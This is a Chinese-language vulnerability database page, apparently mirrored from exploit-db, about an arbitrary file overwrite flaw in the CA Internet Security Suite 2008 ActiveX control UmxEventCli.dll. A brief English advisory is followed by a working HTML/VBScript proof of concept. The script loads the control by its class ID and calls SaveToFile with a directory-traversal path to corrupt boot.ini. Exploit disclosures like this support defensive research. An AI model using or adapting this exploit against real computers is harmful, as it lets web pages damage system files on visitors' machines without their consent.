CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056655 漏洞类型
发布时间 2008-05-28 更新时间 2008-05-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/31856
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/29406/info

A Computer Associates Internet Security Suite ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.

Successful exploits will compromise affected computers and will aid in further attacks.

Internet Security Suite 2008 is vulnerable; other versions may also be affected. 

<!--
CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
remote file corruption poc
by Nine:Situations:Group::surfista

this control is safe for scripting
and safe for initialize

original one: http://retrogod.altervista.org/9sg_CA_poc.html
--> 
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' 
id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>